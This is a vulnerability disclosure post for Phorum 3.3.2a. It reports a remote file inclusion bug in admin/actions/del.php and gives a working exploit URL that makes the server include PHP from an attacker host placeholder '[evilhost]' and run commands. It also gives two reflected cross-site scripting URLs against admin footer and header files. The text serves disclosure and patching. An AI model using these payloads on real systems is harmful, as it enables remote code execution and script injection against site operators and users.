Target: Phorum 3.3.2a (maybee older) Description: Phorum 3.3.2a let's remote users execute arbitary code Found by: Markus Arndt<markus-arndt@web.de> Vendor: http://www.phorum.org Notified Vendor: Yes, already fixed in 3.3.2b Details: Another bug for remote command execution. This time it's admin/actions/del.php :) Some code: <?php require "$include_path/delete_message.php"; delete_messages($id); QueMessage("Message(s) $id and all children were deleted!<br>"); ?> The url to exploit the script would be: http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls That url will make the script include http://[evilhost]/delete_message.php GoGoGo and secure your boxes. :) One other thing before i forget: CSS-Attacks are possible on 2 files.. http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script> http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script> Markus Arndt<markus-arndt@web.de> http://skka.de ________________________________________________________________ Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
